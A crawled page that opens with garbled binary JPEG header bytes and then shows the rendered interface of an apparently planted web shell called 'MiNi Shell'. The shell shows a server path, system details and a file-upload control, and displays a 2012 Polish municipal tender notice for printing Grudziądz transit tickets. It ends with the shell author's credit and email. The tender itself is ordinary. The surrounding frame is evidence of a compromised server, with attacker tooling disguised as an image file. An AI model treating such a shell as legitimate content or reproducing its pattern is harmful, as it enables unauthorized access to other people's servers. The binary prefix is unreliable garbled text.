JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121107/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121107/234819-N-2012.html

<p class="kh_header"><b>Grudziądz: Wytwarzanie i dostawa druków biletów komunikacji publicznej</b><br>
<b>Numer ogłoszenia: 234819 - 2012; data zamieszczenia: 07.11.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasto Grudziądz , ul. Ratuszowa 1, 86-300 Grudziądz, woj. kujawsko-pomorskie, tel. 56 4510233, faks 56 4510233.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.grudziadz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wytwarzanie i dostawa druków biletów komunikacji publicznej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wytwarzanie i dostawa druków biletów komunikacji publicznej.

1)	biletów jednorazowych do ilości maksymalnie 6.660.000 szt. 
           (w 2013 r. do 2.220.000 szt., w 2014 r. do 2.220.000 szt., w 2015 do 2.220.000 szt.)
2)	biletów jednorazowych na obszar Gminy Grudziądz do ilości maksymalnie 30.000 szt.
(w 2013 r. do 10.000 szt., w 2014 r. do 10.000 szt., w 2015 do 10.000 szt.)
3)	biletów jednorazowych na obszar Gminy Rogóźno do ilości maksymalnie 72.000 szt.
(w 2013 r. do 24.000 szt., w 2014 r. do 24.000 szt., w 2015 do 24.000 szt.)	
4)	biletów jednorazowych 60 minutowych do ilości maksymalnie 8.000 szt. (w 2013 r. do 2.600 szt., w 2014 r. do 2.700 szt., w 2015 r. do 2.700 szt.)
5)	biletów jednorazowych 24 godzinnych do ilości maksymalnie 27.000 szt. (w 2013 r. do 9.000 szt., w 2014 r. do 9.000 szt., w 2015r. do 9.000 szt.)
6)	biletów jednorazowych grupowych do ilości maksymalnie 300 szt. w 2015 r. 
7)	karnetów 12 przejazdowych do ilości maksymalnie 192.000 szt.
            ( w 2013 r. do 64.000 szt., w 2014 r. do 64.000 szt., w 2015 r. do 64.000 szt.)
8)	karnetów 6 przejazdowych do ilości maksymalnie 576.000 szt.
            (w 2013 r. do 192.000 szt., w 2014 r. do 192.000 szt., w 2015 r. do 192.000 szt.)
9)	karnetów 4 przejazdowych do ilości maksymalnie 1.440.000 szt.
            (w 2013 r. do 480.000 szt., w 2014 r. do 480.000 szt., w 2015 r. do 480.000 szt.)
10)	znaczków do biletów okresowych do ilości maksymalnie 468.000 szt.
            (w 2013 r. do 156.000 szt., w 2014 r. do 156.000 szt., w 2015 r. do 156.000 szt.)
11)	 bloczków testowych do ilości maksymalnie 900.000 szt.
 (w 2013 r. do 300.000 szt., w 2014 r. do 300.000 szt., w 2015 r. do 300.000 szt.)
Podane ilości są wielkościami orientacyjnymi, przyjętymi dla porównania ofert i wyboru najkorzystniejszej oferty.

Szczegółowy opis przedmiotu zamówienia:
1)	bilet jednorazowy o wymiarach 70 x 33 mm, klejony w bloczki po 100 sztuk, drukowany na papierze offsetowym o gramaturze od 80 g/m2 do 90 g/m2, na którym zaaplikowany jest hologram 5 mm (na awersie biletu) z naniesionym wzorem graficznym na awersie biletu, który jest własnością Wykonawcy i posiada jego zastrzeżone cechy oraz jest zarejestrowany w Międzynarodowym Stowarzyszeniu Producentów Hologramów (IHMA). Seria i herb Zamawiającego świecące w promieniach lampy ultrafioletowej, numer biletu i nazwa Zamawiającego farbą dowolną. Zamawiający raz w miesiącu będzie ustalał z Wykonawcą ilość zamawianych biletów i zamieszczane na nich nominały, 
2)	bilet jednorazowy na obszar Gminy Grudziądz o wymiarach 70 x 33 mm, klejony w bloczki po 100 sztuk, drukowany na papierze offsetowym  w kolorze zielonym (RAL 6018) o gramaturze od 80 g/m2 do 90 g/m2, na którym zaaplikowany jest hologram 5 mm (na awersie biletu) z naniesionym wzorem graficznym na awersie biletu, który jest własnością Wykonawcy i posiada jego zastrzeżone cechy oraz jest zarejestrowany w Międzynarodowym Stowarzyszeniu Producentów Hologramów (IHMA). Seria i herb Zamawiającego świecące w promieniach lampy ultrafioletowej, numer biletu i nazwa Zamawiającego farbą dowolną. Zamawiający raz w miesiącu będzie ustalał z Wykonawcą ilość zamawianych biletów i zamieszczane na nich nominały,
3)	bilet jednorazowy na obszar Gminy Rogóźno o wymiarach 70 x 33 mm, klejony w bloczki po 100 sztuk, drukowany na papierze offsetowym w kolorze pomarańczowym (RAL 1033) o gramaturze od 80 g/m2 do 90 g/m2, na którym zaaplikowany jest hologram 5 mm (na awersie biletu) z naniesionym wzorem graficznym na awersie biletu, który jest własnością Wykonawcy i posiada jego zastrzeżone cechy oraz jest zarejestrowany w Międzynarodowym Stowarzyszeniu Producentów Hologramów (IHMA). Seria i herb Zamawiającego świecące w promieniach lampy ultrafioletowej, numer biletu i nazwa Zamawiającego farbą dowolną. Zamawiający raz w miesiącu będzie ustalał z Wykonawcą ilość zamawianych biletów i zamieszczane na nich nominały,
4)	bilet jednorazowy 60 minutowy o wymiarach 70 x 33 mm, klejony w bloczki po 100 sztuk, drukowany na papierze offsetowym o gramaturze od 80 g/m2 do 90 g/m2, na którym zaaplikowany jest hologram 5 mm ( na awersie biletu) z naniesionym wzorem graficznym na awersie biletu, który jest własnością Wykonawcy i posiada jego zastrzeżone cechy oraz jest zarejestrowany w Międzynarodowym Stowarzyszeniu Producentów Hologramów (IHMA). Seria i herb Zamawiającego świecące w promieniach lampy ultrafioletowej, numer biletu i nazwa Zamawiającego farbą dowolną. Zamawiający raz w miesiącu będzie ustalał z Wykonawcą ilość zamawianych biletów i zamieszczane na nich nominały,
5)	bilet jednorazowy 24 godzinny o wymiarach 70 x 33 mm, klejony w bloczki po 100 sztuk, drukowany na papierze offsetowym o gramaturze od 80 g/m2 do 90 g/m2, na którym zaaplikowany jest hologram 5 mm ( na awersie biletu) z naniesionym wzorem graficznym na awersie biletu, który jest własnością Wykonawcy i posiada jego zastrzeżone cechy oraz jest zarejestrowany w Międzynarodowym Stowarzyszeniu Producentów Hologramów (IHMA). Seria i herb Zamawiającego świecące w promieniach lampy ultrafioletowej, numer biletu i nazwa Zamawiającego farbą dowolną. Zamawiający raz w miesiącu będzie ustalał z Wykonawcą ilość zamawianych biletów i zamieszczane na nich nominały,
6)	bilet jednorazowy grupowy o wymiarach 70 x 33 mm, klejony w bloczki po 100 sztuk, drukowany na papierze offsetowym o gramaturze od 80 g/m2 do 90 g/m2, na którym zaaplikowany jest hologram 5 mm ( na awersie biletu) z naniesionym wzorem graficznym na awersie biletu, który jest własnością Wykonawcy i posiada jego zastrzeżone cechy oraz jest zarejestrowany w Międzynarodowym Stowarzyszeniu Producentów Hologramów (IHMA). Seria i herb Zamawiającego świecące w promieniach lampy ultrafioletowej, numer biletu i nazwa Zamawiającego farbą dowolną. Zamawiający raz w miesiącu będzie ustalał z Wykonawcą ilość zamawianych biletów i zamieszczane na nich nominały,
7)	karnet 12 przejazdowy zawierający odcinki przeznaczone do pojedynczego kasowania z perforacją umożliwiającą ich odrywanie, klejony w bloczki po 100 sztuk. Wymiary pojedynczego odcinka 70 x 33 mm. Karnet drukowany na papierze offsetowym o gramaturze od 80 g/m2 do 90 g/m2, na którym zaaplikowany jest hologram 5 mm (na awersie karnetu) z naniesionym wzorem graficznym, który jest własnością Wykonawcy i posiada jego zastrzeżone cechy oraz jest zarejestrowany w Międzynarodowym Stowarzyszeniu Producentów Hologramów (IHMA). Seria i herb Zamawiającego  świecące w promieniach lampy ultrafioletowej, numer biletu i nazwa Zamawiającego farbą dowolną. Zamawiający raz w miesiącu będzie ustalał z Wykonawcą ilość zamawianych biletów i zamieszczane na nich nominały, 
8)	karnet 6 przejazdowy zawierający odcinki przeznaczone do pojedynczego kasowania z perforacją umożliwiającą ich odrywanie, klejone w bloczki po 100 sztuk. Wymiary pojedynczego odcinka 70 x 33 mm. Karnet drukowany na papierze offsetowym o gramaturze od 80 g/m2 do 90 g/m2, na którym zaaplikowany jest hologram 5 mm (na awersie karnetu) z naniesionym wzorem graficznym, który jest własnością Wykonawcy i posiada jego zastrzeżone cechy oraz jest zarejestrowany w Międzynarodowym Stowarzyszeniu Producentów Hologramów (IHMA). Seria i herb Zamawiającego  świecące w promieniach lampy ultrafioletowej, numer biletu i nazwa Zamawiającego farbą dowolną. Zamawiający raz w miesiącu będzie ustalał z Wykonawcą ilość zamawianych biletów i zamieszczane na nich nominały, 
9)	karnet 4 przejazdowy zawierający odcinki przeznaczone do pojedynczego kasowania z perforacją umożliwiającą ich odrywanie, klejone w bloczki po 100 sztuk. Wymiary pojedynczego odcinka 70 x 33 mm. Karnet drukowany na papierze offsetowym o gramaturze od 80 g/m2 do 90 g/m2, na którym zaaplikowany jest hologram 5 mm (na awersie biletu) z naniesionym wzorem graficznym, który jest własnością Wykonawcy i posiada jego zastrzeżone cechy oraz jest zarejestrowany w Międzynarodowym Stowarzyszeniu Producentów Hologramów (IHMA). Seria i herb Zamawiającego  świecące w promieniach lampy ultrafioletowej, numer biletu i nazwa Zamawiającego farbą dowolną. Zamawiający raz w miesiącu będzie ustalał z Wykonawcą ilość zamawianych biletów i zamieszczane na nich nominały,
10)	znaczek do biletu okresowego o wymiarach 30 x 30 mm drukowany na papierze offsetowym o gramaturze od 80 g/m2 do 90 g/m2, na którym zaaplikowany jest hologram w kształcie kwadratu o długości boku 8 mm z naniesionym kolejnym numerem miesiąca i rokiem. Seria na pojedynczych odcinkach świecący
w promieniach lampy ultrafioletowej, numer odcinka farbą dowolną. Zaaplikowany hologram z wzorem graficznym, ma być własnością Wykonawcy i posiadać jego zastrzeżone cechy oraz być zarejestrowany w Międzynarodowym Stowarzyszeniu Producentów Hologramów (IHMA). Na znaczku winno się znajdować miejsce na wpisanie numeru legitymacji. Na awersie znaczka należy umieścić nazwę Zamawiającego. Zamawiający raz w miesiącu będzie ustalał z Wykonawcą ilość zamawianych znaczków i zamieszczane na nich nominały.
11)	bloczki testowe o wymiarach 70 x 33 mm, klejone w bloczki po 100 sztuk, drukowane na papierze offsetowym o gramaturach od 80 g/m2 do 90 g/m2, na którym nie ma zaaplikowanego hologramu, bez nadawaniu numeru oraz serii.

Bilety wymienione w pozycjach 1- 9 posiadają maksymalnie trzy kolory, zaś znaczki  do biletu miesięcznego dwa kolory.

Uwaga: Zamawiający będzie składał zamówienia cząstkowe jeden raz w miesiącu z realizacją w ciągu 14 dni od daty złożenia zamówienia.

 Podwykonawcy:
Wykonawca, który zamierza powierzyć podwykonawcom wykonanie jakiejkolwiek części zamówienia, zobowiązany jest wskazać na druku oferty zakresy zamówienia powierzane podwykonawcom. Brak jakiejkolwiek wzmianki w tym zakresie na formularzu oferty, będzie uznawane za stwierdzenie samodzielnego wykonania zamówienia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających do 50% wartości zamówienia podstawowego. Przedmiotem zamówienia będzie wytworzenie i dostawa druków bietów komunikacji publicznej.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.82.30.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2015.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania warunków w tym zakresie. Zamawiający dokona oceny spełnienia warunków udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania warunków w tym zakresie. Zamawiający dokona oceny spełnienia warunków udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania warunków w tym zakresie. Zamawiający dokona oceny spełnienia warunków udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania warunków w tym zakresie. Zamawiający dokona oceny spełnienia warunków udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania warunków w tym zakresie. Zamawiający dokona oceny spełnienia warunków udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Oświadczenie, że znak holograficzny został wpisany do rejestru IHMA (Międzynarodowe Stowarzyszenie Producentów Hologramów)</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Pełnomocnictwo - jeżeli dotyczy.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Przewiduje się możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w zakresie wynagrodzenia, w przypadku zmiany obowiązującej stawki VAT.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.grudziadz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski, Biuro Zamówień Publicznych, ul. Ratuszowa 1, 86-300 Grudziądz, pok. 114.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.11.2012 godzina 09:30, miejsce: Urząd Miejski, Biuro Zamówień Publicznych, ul. Ratuszowa 1, 86-300 Grudziądz, pok. 114.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Oświadczenia, wnioski, zawiadomienia oraz informacje Zamawiający i Wykonawcy przekazują pisemnie na adres Zamawiającego, faksem na numer: 56 45 10 233 lub drogą elektroniczną na adres bzp@um.grudziadz.pl. 
Forma pisemna zastrzeżona jest:
     1)  dla złożenia oferty wraz z załącznikami, 
     2) dla oświadczeń i dokumentów potwierdzających spełnianie warunków udziału w postępowaniu (w tym dla dokumentów uzupełnianych na podstawie art. 26 ust.3 Pzp), 
    3)  dla pełnomocnictwa..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com